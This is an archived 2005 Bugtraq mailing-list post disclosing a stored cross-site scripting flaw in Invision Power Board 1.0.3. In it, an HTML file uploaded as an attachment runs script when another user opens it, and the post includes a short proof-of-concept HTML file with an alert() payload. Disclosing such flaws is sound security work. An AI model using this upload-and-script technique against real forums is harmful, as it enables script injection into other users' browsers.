[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    ipb Css bug(now public)
From:       virusishacker () gmail ! com
Date:       2005-08-05 0:03:59
Message-ID: 20050805000359.8258.qmail () securityfocus ! com
[Download RAW message or body]

the css found when you uploading a file to the server by the "atteched file" function..
in ipb you can upload some HTML file,in the html file write this:
<html>
<body>
<script>alert('Css found By V[i]RuS');</script>
</body>
</html>
when someone will click on the attechment file the script will run.
sry about my poor english..
bug discoverd V[i]RuS
tested succesfully on ipb 1.0.3 all the vers should be vuln =]

[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic